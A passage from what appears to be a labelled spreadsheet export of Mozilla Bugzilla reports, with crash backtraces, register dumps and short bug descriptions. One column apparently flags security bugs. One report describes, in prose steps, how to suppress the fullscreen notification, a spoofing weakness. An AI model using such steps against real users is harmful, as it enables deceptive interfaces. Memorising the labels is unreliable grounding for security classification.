#5  0x00000000004f738d in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::statement (this=this@entry=0x7fffffffb230, yieldHandling=yieldHandling@entry=js::frontend::YieldIsName, canHaveDirectives=&lt;optimized out&gt;) at js/src/frontend/Parser.cpp:6599
#6  0x00000000004f781a in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::statements (this=this@entry=0x7fffffffb230, yieldHandling=yieldHandling@entry=js::frontend::YieldIsName) at js/src/frontend/Parser.cpp:3090
#7  0x00000000004f7bdb in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::functionBody (this=this@entry=0x7fffffffb230, inHandling=inHandling@entry=js::frontend::InAllowed, yieldHandling=js::frontend::YieldIsName, kind=kind@entry=js::frontend::Statement, type=type@entry=js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::StatementListBody) at js/src/frontend/Parser.cpp:1129
#8  0x00000000004ceb5f in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::standaloneFunctionBody (this=this@entry=0x7fffffffb230, fun=..., fun@entry=..., formals=formals@entry=..., generatorKind=generatorKind@entry=js::NotGenerator, inheritedDirectives=..., newDirectives=newDirectives@entry=0x7fffffffab50, enclosingStaticScope=enclosingStaticScope@entry=...) at js/src/frontend/Parser.cpp:959
#9  0x000000000063a9f2 in BytecodeCompiler::compileFunctionBody (this=this@entry=0x7fffffffabb0, fun=fun@entry=..., formals=formals@entry=..., generatorKind=generatorKind@entry=js::NotGenerator) at js/src/frontend/BytecodeCompiler.cpp:708
#10 0x000000000063ac7d in CompileFunctionBody (cx=&lt;optimized out&gt;, fun=..., options=..., formals=..., srcBuf=..., enclosingStaticScope=..., generatorKind=js::NotGenerator) at js/src/frontend/BytecodeCompiler.cpp:922
#11 0x000000000063ace4 in js::frontend::CompileFunctionBody (cx=cx@entry=0x7ffff6907000, fun=..., fun@entry=..., options=..., formals=..., formals@entry=..., srcBuf=..., enclosingStaticScope=..., enclosingStaticScope@entry=...) at js/src/frontend/BytecodeCompiler.cpp:932
#12 0x0000000000ba531a in FunctionConstructor (cx=0x7ffff6907000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;, generatorKind=&lt;optimized out&gt;) at js/src/jsfun.cpp:1927
#13 0x00007ffff7ff51d7 in ?? ()
#14 0x00007fffffffd080 in ?? ()
#15 0x00007fffffffc3a0 in ?? ()
#16 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7ffff7e5e060	140737352425568
rcx	0x7ffff6ca53cd	140737333842893
rdx	0x0	0
rsi	0x7ffff6f7a9d0	140737336814032
rdi	0x7ffff6f791c0	140737336807872
rbp	0x7fffffffa320	140737488331552
rsp	0x7fffffffa320	140737488331552
r8	0x7ffff7fd4780	140737353959296
r9	0x1	1
r10	0x7fffffffa0e0	140737488330976
r11	0x7ffff6c27960	140737333328224
r12	0x3	3
r13	0x7fffffffb230	140737488335408
r14	0x0	0
r15	0x7fffffffb260	140737488335456
rip	0x429010 &lt;JS::Value::toObject() const+28&gt;
=&gt; 0x429010 &lt;JS::Value::toObject() const+28&gt;:	movl   $0x4d5,0x0
   0x42901b &lt;JS::Value::toObject() const+39&gt;:	callq  0x49c3d0 &lt;abort()&gt;</t>
        </is>
      </c>
      <c r="X2227" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2228">
      <c r="A2228" t="n">
        <v>1588896</v>
      </c>
      <c r="B2228" t="inlineStr">
        <is>
          <t>2019-10-15 12:43:15 -0700</t>
        </is>
      </c>
      <c r="C2228" t="inlineStr">
        <is>
          <t>Remove servo-prs</t>
        </is>
      </c>
      <c r="D2228" t="inlineStr">
        <is>
          <t>2019-11-06 10:14:21 -0800</t>
        </is>
      </c>
      <c r="E2228" t="n">
        <v>1</v>
      </c>
      <c r="F2228" t="n">
        <v>1</v>
      </c>
      <c r="G2228" t="n">
        <v>7</v>
      </c>
      <c r="H2228" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2228" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2228" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K2228" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2228" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2228" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2228" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2228" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2228" t="inlineStr"/>
      <c r="Q2228" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2228" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2228" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2228" t="n">
        <v>1</v>
      </c>
      <c r="U2228" t="n">
        <v>0</v>
      </c>
      <c r="V2228" t="n">
        <v>4</v>
      </c>
      <c r="W2228" t="inlineStr">
        <is>
          <t>I verified with jdm to remove it.</t>
        </is>
      </c>
      <c r="X2228" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2229">
      <c r="A2229" t="n">
        <v>899022</v>
      </c>
      <c r="B2229" t="inlineStr">
        <is>
          <t>2013-07-29 02:58:47 -0700</t>
        </is>
      </c>
      <c r="C2229" t="inlineStr">
        <is>
          <t>crash in nsCOMPtr_base::assign_with_AddRef | nsWindowRoot::PreHandleEvent</t>
        </is>
      </c>
      <c r="D2229" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:28 -0800</t>
        </is>
      </c>
      <c r="E2229" t="n">
        <v>1</v>
      </c>
      <c r="F2229" t="n">
        <v>1</v>
      </c>
      <c r="G2229" t="n">
        <v>3</v>
      </c>
      <c r="H2229" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2229" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2229" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K2229" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2229" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2229" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2229" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2229" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2229" t="inlineStr">
        <is>
          <t>[adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q2229" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2229" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2229" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T2229" t="n">
        <v>1</v>
      </c>
      <c r="U2229" t="n">
        <v>0</v>
      </c>
      <c r="V2229" t="n">
        <v>20</v>
      </c>
      <c r="W2229" t="inlineStr">
        <is>
          <t>It's #10 browser crasher on Mac OS X in 22.0.
Signature 	nsCOMPtr_base::assign_with_AddRef(nsISupports*) | nsWindowRoot::PreHandleEvent(nsEventChainPreVisitor&amp;) More Reports Search
UUID 	b7fb3d22-1570-4eb8-8c15-e7d7a2130729
Date Processed	2013-07-29 04:07:12.795335
Uptime	35480
Install Age 	94426 since version was first installed.
Install Time 	2013-07-28 01:53:08
Product 	Firefox
Version 	23.0
Build ID 	20130725195523
Release Channel 	beta
OS 	Mac OS X
OS Version 	10.8.4 12E55
Build Architecture 	amd64
Build Architecture Info 	family 6 model 23 stepping 10 | 2
Crash Reason 	EXC_BAD_ACCESS / KERN_INVALID_ADDRESS
Crash Address 	0x8
App Notes 	
AdapterVendorID: 0x10de, AdapterDeviceID: 0x 863GL Layers? GL Context? GL Context+ GL Layers+ 
Frame 	Module 	Signature 	Source
0 	XUL 	nsCOMPtr_base::assign_with_AddRef(nsISupports*) 	obj-firefox/x86_64/xpcom/build/nsCOMPtr.cpp
1 	XUL 	nsWindowRoot::PreHandleEvent(nsEventChainPreVisitor&amp;) 	obj-firefox/x86_64/dist/include/nsCOMPtr.h
2 	XUL 	nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) 	content/events/src/nsEventDispatcher.cpp
3 	XUL 	nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) 	content/events/src/nsEventDispatcher.cpp
4 	XUL 	nsINode::DispatchEvent(nsIDOMEvent*, bool*) 	content/base/src/nsINode.cpp
5 	XUL 	nsContentUtils::DispatchEvent(nsIDocument*, nsISupports*, nsAString_internal const&amp;, bool, bool, bool, bool*) 	content/base/src/nsContentUtils.cpp
6 	XUL 	nsContentUtils::DispatchTrustedEvent(nsIDocument*, nsISupports*, nsAString_internal const&amp;, bool, bool, bool*) 	content/base/src/nsContentUtils.cpp
7 	XUL 	nsGlobalWindow::FireOfflineStatusEvent() 	dom/base/nsGlobalWindow.cpp
8 	XUL 	nsGlobalWindow::Observe(nsISupports*, char const*, unsigned short const*) 	dom/base/nsGlobalWindow.cpp
9 	XUL 	nsObserverList::NotifyObservers(nsISupports*, char const*, unsigned short const*) 	xpcom/ds/nsObserverList.cpp
10 	XUL 	nsObserverService::NotifyObservers(nsISupports*, char const*, unsigned short const*) 	xpcom/ds/nsObserverService.cpp
11 	XUL 	nsIOService::SetOffline(bool) 	netwerk/base/src/nsIOService.cpp
12 	XUL 	nsIOService::Observe(nsISupports*, char const*, unsigned short const*) 	netwerk/base/src/nsIOService.cpp
13 	XUL 	_ZThn8_N11nsIOService7ObserveEP11nsISupportsPKcPKt 	netwerk/base/src/nsIOService.cpp
14 	XUL 	nsObserverList::NotifyObservers(nsISupports*, char const*, unsigned short const*) 	xpcom/ds/nsObserverList.cpp
15 	XUL 	nsObserverService::NotifyObservers(nsISupports*, char const*, unsigned short const*) 	xpcom/ds/nsObserverService.cpp
16 	XUL 	nsXREDirProvider::DoShutdown() 	toolkit/xre/nsXREDirProvider.cpp
17 	XUL 	ScopedXPCOMStartup::~ScopedXPCOMStartup() 	toolkit/xre/nsAppRunner.cpp
18 	XUL 	XREMain::XRE_main(int, char**, nsXREAppData const*) 	toolkit/xre/nsAppRunner.cpp
19 	XUL 	XRE_main 	toolkit/xre/nsAppRunner.cpp
20 	firefox 	main 	browser/app/nsBrowserApp.cpp
21 	firefox 	start 	
More reports at:
https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=nsCOMPtr_base%3A%3Aassign_with_AddRef%28nsISupports*%29+|+nsWindowRoot%3A%3APreHandleEvent%28nsEventChainPreVisitor%26%29
https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=%400x0+|+nsCOMPtr_base%3A%3Aassign_with_AddRef%28nsISupports*%29+|+nsWindowRoot%3A%3APreHandleEvent%28nsEventChainPreVisitor%26%29</t>
        </is>
      </c>
      <c r="X2229" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2230">
      <c r="A2230" t="n">
        <v>920753</v>
      </c>
      <c r="B2230" t="inlineStr">
        <is>
          <t>2013-09-25 13:58:04 -0700</t>
        </is>
      </c>
      <c r="C2230" t="inlineStr">
        <is>
          <t>[stage] Stage is throwing sporadic 500 errors</t>
        </is>
      </c>
      <c r="D2230" t="inlineStr">
        <is>
          <t>2013-09-25 16:48:06 -0700</t>
        </is>
      </c>
      <c r="E2230" t="n">
        <v>1</v>
      </c>
      <c r="F2230" t="n">
        <v>1</v>
      </c>
      <c r="G2230" t="n">
        <v>4</v>
      </c>
      <c r="H2230" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2230" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2230" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2230" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2230" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2230" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2230" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2230" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2230" t="inlineStr"/>
      <c r="Q2230" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2230" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2230" t="inlineStr">
        <is>
          <t>61</t>
        </is>
      </c>
      <c r="T2230" t="n">
        <v>1</v>
      </c>
      <c r="U2230" t="n">
        <v>0</v>
      </c>
      <c r="V2230" t="n">
        <v>8</v>
      </c>
      <c r="W2230" t="inlineStr">
        <is>
          <t>Stage sporadically throws 500 errors however they don't appear to be logged by sentry. Errormill is empty.
[14:43:54.002] GET https://crash-stats.allizom.org/home/frontpage_json?product=Firefox&amp;versions=25.0b1 [HTTP/1.1 500 INTERNAL SERVER ERROR 60736ms]</t>
        </is>
      </c>
      <c r="X2230" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2231">
      <c r="A2231" t="n">
        <v>1739091</v>
      </c>
      <c r="B2231" t="inlineStr">
        <is>
          <t>2021-11-03 03:16:34 -0700</t>
        </is>
      </c>
      <c r="C2231" t="inlineStr">
        <is>
          <t>Force Collision Between requestFullscreen() and requestPointerLock() Notification will Hide Both Notification</t>
        </is>
      </c>
      <c r="D2231" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:26 -0700</t>
        </is>
      </c>
      <c r="E2231" t="n">
        <v>1</v>
      </c>
      <c r="F2231" t="n">
        <v>1</v>
      </c>
      <c r="G2231" t="n">
        <v>3</v>
      </c>
      <c r="H2231" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2231" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2231" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2231" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2231" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M2231" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2231" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2231" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2231" t="inlineStr">
        <is>
          <t>Windows only? [reporter-external] [client-bounty-form][sec-survey][adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q2231" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2231" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2231" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T2231" t="n">
        <v>1</v>
      </c>
      <c r="U2231" t="n">
        <v>0</v>
      </c>
      <c r="V2231" t="n">
        <v>27</v>
      </c>
      <c r="W2231" t="inlineStr">
        <is>
          <t>Created attachment 9249016
testcase.html
After requesting fullscreen then request pointer lock and append `fullscreenElement` to `pointerLock` element multiple times, interestingly when the notification collide, the both notification will immediately hidden and will not show on the screen.
## Steps to reproduce
1. Visit attached testcase.html
2. Click anywhere on the page
3. Browser goes into fullscreen without any fullscreen notification</t>
        </is>
      </c>
      <c r="X2231" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2232">
      <c r="A2232" t="n">
        <v>1408854</v>
      </c>
      <c r="B2232" t="inlineStr">
        <is>
          <t>2017-10-16 01:43:17 -0700</t>
        </is>
      </c>
      <c r="C2232" t="inlineStr">
        <is>
          <t>Very slow tab-switching when a tab with a large data URI is open</t>
        </is>
      </c>
      <c r="D2232" t="inlineStr">
        <is>
          <t>2023-01-12 14:28:48 -0800</t>
        </is>
      </c>
      <c r="E2232" t="n">
        <v>1</v>
      </c>
      <c r="F2232" t="n">
        <v>1</v>
      </c>
      <c r="G2232" t="n">
        <v>2</v>
      </c>
      <c r="H2232" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2232" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2232" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K2232" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2232" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2232" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2232" t="inlineStr">
        <is>
          <t>[reserve-photon-performance]</t>
        </is>
      </c>
      <c r="Q2232" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2232" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2232" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T2232" t="n">
        <v>1</v>
      </c>
      <c r="U2232" t="n">
        <v>0</v>
      </c>
      <c r="V2232" t="n">
        <v>18</v>
      </c>
      <c r="W2232" t="inlineStr">
        <is>
          <t>I've seen this a couple of times now, but only just figured out what it was.
STR:
1) On an existing profile, go to about:telemetry
2) At the bottom-left, click "Raw JSON"
-&gt; A new tab opens with the data URI for the raw JSON.
3) Try switching tabs
Actual Results
-&gt; 2-3 second tab switch time.
Expected Results
-&gt; Tab switch speed not affected.
4) Close the data URI tab
-&gt; Tab switch performance reverts to normal
Here's a couple of profiles:
https://perfht.ml/2yrl1w9
https://perfht.ml/2yqOhCY</t>
        </is>
      </c>
      <c r="X2232" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2233">
      <c r="A2233" t="n">
        <v>48225</v>
      </c>
      <c r="B2233" t="inlineStr">
        <is>
          <t>2000-08-09 10:26:04 -0700</t>
        </is>
      </c>
      <c r="C2233" t="inlineStr">
        <is>
          <t>Install.log: Crash results when writing to read-only file</t>
        </is>
      </c>
      <c r="D2233" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E2233" t="n">
        <v>1</v>
      </c>
      <c r="F2233" t="n">
        <v>1</v>
      </c>
      <c r="G2233" t="n">
        <v>6</v>
      </c>
      <c r="H2233" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2233" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2233" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K2233" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2233" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2233" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2233" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2233" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2233" t="inlineStr">
        <is>
          <t>[nsbeta3+]</t>
        </is>
      </c>
      <c r="Q2233" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2233" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2233" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T2233" t="n">
        <v>1</v>
      </c>
      <c r="U2233" t="n">
        <v>0</v>
      </c>
      <c r="V2233" t="n">
        <v>11</v>
      </c>
      <c r="W2233" t="inlineStr">
        <is>
          <t>Build: 2000-08-08-09-M18(WIN), 2000-08-08-11-M18(MAC), 2000-08-08-08-M18(LINUX)
1. From the Netscape directory, mark the install.log as read-only.  If no such 
   file exists, then make one.
2. Launch Seamonkey
3. From http://jimbob/trigger3.html, trigger any test case
4. Click Install button from the confirmation button
RESULT:
Crash.  Installation does occur.
EXPECTED RESULT:
No crash.
TalkBack Incident ID: 15513534
Stack Trace
nsLoggingProgressListener::AfterJavascriptEvaluation 
[d:\builds\seamonkey\mozilla\xpinstall\src\nsLoggingProgressNotifier.cpp, line 
145] 
nsTopProgressListener::AfterJavascriptEvaluation 
[d:\builds\seamonkey\mozilla\xpinstall\src\nsTopProgressNotifier.cpp, line 117] 
RunInstallOnThread 
[d:\builds\seamonkey\mozilla\xpinstall\src\nsSoftwareUpdateRun.cpp, line 492] 
_PR_NativeRunThread [pruthr.c, line 421] 
MSVCRT.dll + 0x3820 (0x78003820) 
KERNEL32.dll + 0x4ee8 (0x77f04ee8)</t>
        </is>
      </c>
      <c r="X2233" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2234">
      <c r="A2234" t="n">
        <v>654799</v>
      </c>
      <c r="B2234" t="inlineStr">
        <is>
          <t>2011-05-04 12:14:06 -0700</t>
        </is>
      </c>
      <c r="C2234" t="inlineStr">
        <is>
          <t>Need remote access to talos-r3-fed-003 to debug a regression</t>
        </is>
      </c>
      <c r="D2234" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2234" t="n">
        <v>1</v>
      </c>
      <c r="F2234" t="n">
        <v>1</v>
      </c>
      <c r="G2234" t="n">
        <v>5</v>
      </c>
      <c r="H2234" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2234" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2234" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2234" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2234" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2234" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2234" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2234" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2234" t="inlineStr">
        <is>
          <t>[buildduty]</t>
        </is>
      </c>
      <c r="Q2234" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2234" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2234" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2234" t="n">
        <v>1</v>
      </c>
      <c r="U2234" t="n">
        <v>0</v>
      </c>
      <c r="V2234" t="n">
        <v>15</v>
      </c>
      <c r="W2234" t="inlineStr">
        <is>
          <t>This is pretty high priority, so the sooner the better.</t>
        </is>
      </c>
      <c r="X2234" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2235">
      <c r="A2235" t="n">
        <v>110686</v>
      </c>
      <c r="B2235" t="inlineStr">
        <is>
          <t>2001-11-18 12:44:25 -0800</t>
        </is>
      </c>
      <c r="C2235" t="inlineStr">
        <is>
          <t>nsStandardURL not thread-safe</t>
        </is>
      </c>
      <c r="D2235" t="inlineStr">
        <is>
          <t>2001-11-27 16:53:54 -0800</t>
        </is>
      </c>
      <c r="E2235" t="n">
        <v>1</v>
      </c>
      <c r="F2235" t="n">
        <v>1</v>
      </c>
      <c r="G2235" t="n">
        <v>3</v>
      </c>
      <c r="H2235" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2235" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2235" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2235" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2235" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2235" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N2235" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2235" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2235" t="inlineStr"/>
      <c r="Q2235" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2235" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2235" t="inlineStr">
        <is>
          <t>mozilla0.9.7</t>
        </is>
      </c>
      <c r="T2235" t="n">
        <v>1</v>
      </c>
      <c r="U2235" t="n">
        <v>0</v>
      </c>
      <c r="V2235" t="n">
        <v>20</v>
      </c>
      <c r="W2235" t="inlineStr">
        <is>
          <t>cvs build from this weekend, i get the following on startup.
###!!! ASSERTION: NS_ENSURE_TRUE(unknownOther) failed: 'unknownOther', file 
f:\build\mozilla\netwerk\base\src\nsStandardURL.cpp, line 1048
WEBSHELL+ = 3
###!!! ASSERTION: cannot handle open-ended tag name query: 'Error', file 
f:\build\mozilla\content\xul\templates\src\nsContentTagTestNode.cpp, line 84
Start reading in bookmarks.html
Finished reading in bookmarks.html  (111000 microseconds)
Error loading URL http://home.netscape.com/kids/index.html : 804b0002
Error loading URL http://family.netscape.com/family/kids/main.tmpl : 804b0002
###!!! ASSERTION: nsStandardURL not thread-safe: 'owningThread == 
NS_CurrentThread()', file f:\build\mozilla\xpcom\base\nsDebug.cpp, line 528
###!!! ASSERTION: nsStandardURL not thread-safe: 'owningThread == 
NS_CurrentThread()', file f:\build\mozilla\xpcom\base\nsDebug.cpp, line 528
WEBSHELL+ = 4
WEBSHELL+ = 5
WEBSHELL+ = 6
###!!! ASSERTION: NS_ENSURE_TRUE(unknownOther) failed: 'unknownOther', file 
f:\build\mozilla\netwerk\base\src\nsStandardURL.cpp, line 1048
###!!! ASSERTION: NS_ENSURE_TRUE(unknownOther) failed: 'unknownOther', file 
f:\build\mozilla\netwerk\base\src\nsStandardURL.cpp, line 1048
###!!! ASSERTION: nsStandardURL not thread-safe: 'owningThread == 
NS_CurrentThread()', file f:\build\mozilla\xpcom\base\nsDebug.cpp, line 528
###!!! ASSERTION: nsStandardURL not thread-safe: 'owningThread == 
NS_CurrentThread()', file f:\build\mozilla\xpcom\base\nsDebug.cpp, line 528
###!!! ASSERTION: NS_ENSURE_TRUE(unknownOther) failed: 'unknownOther', file 
f:\build\mozilla\netwerk\base\src\nsStandardURL.cpp, line 1048
###!!! ASSERTION: nsStandardURL not thread-safe: 'owningThread == 
NS_CurrentThread()', file f:\build\mozilla\xpcom\base\nsDebug.cpp, line 528
WEBSHELL+ = 7
###!!! ASSERTION: NS_ENSURE_TRUE(unknownOther) failed: 'unknownOther', file 
f:\build\mozilla\netwerk\base\src\nsStandardURL.cpp, line 1048
WEBSHELL+ = 8
###!!! ASSERTION: nsStandardURL not thread-safe: 'owningThread == 
NS_CurrentThread()', file f:\build\mozilla\xpcom\base\nsDebug.cpp, line 528
###!!! ASSERTION: NS_ENSURE_TRUE(unknownOther) failed: 'unknownOther', file 
f:\build\mozilla\netwerk\base\src\nsStandardURL.cpp, line 1048
Document http://family.netscape.com/family/main.tmpl loaded successfully
This is making my build almost unusable.</t>
        </is>
      </c>
      <c r="X2235" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2236">
      <c r="A2236" t="n">
        <v>328748</v>
      </c>
      <c r="B2236" t="inlineStr">
        <is>
          <t>2006-02-27 09:50:50 -0800</t>
        </is>
      </c>
      <c r="C2236" t="inlineStr">
        <is>
          <t>Report inability to just view parameters - not edit them</t>
        </is>
      </c>
      <c r="D2236" t="inlineStr">
        <is>
          <t>2006-03-09 19:44:21 -0800</t>
        </is>
      </c>
      <c r="E2236" t="n">
        <v>1</v>
      </c>
      <c r="F2236" t="n">
        <v>1</v>
      </c>
      <c r="G2236" t="n">
        <v>4</v>
      </c>
      <c r="H2236" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2236" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2236" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K2236" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L2236" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2236" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2236" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2236" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2236" t="inlineStr"/>
      <c r="Q2236" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R2236" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2236" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T2236" t="n">
        <v>0</v>
      </c>
      <c r="U2236" t="n">
        <v>0</v>
      </c>
      <c r="V2236" t="n">
        <v>7</v>
      </c>
      <c r="W2236" t="inlineStr">
        <is>
          <t>Sorry, you aren't a member of the 'tweakparams' group, and so you are not authorized to modify parameters.
The error is cute, but wrong. I'm not trying to modify parameters, i'm trying to view them. Either give me a proper error or give me the content of the page and at most warn me that i can't make changes :)</t>
        </is>
      </c>
      <c r="X2236" t="n">
        <v>0</v>
      </c>
    </row>
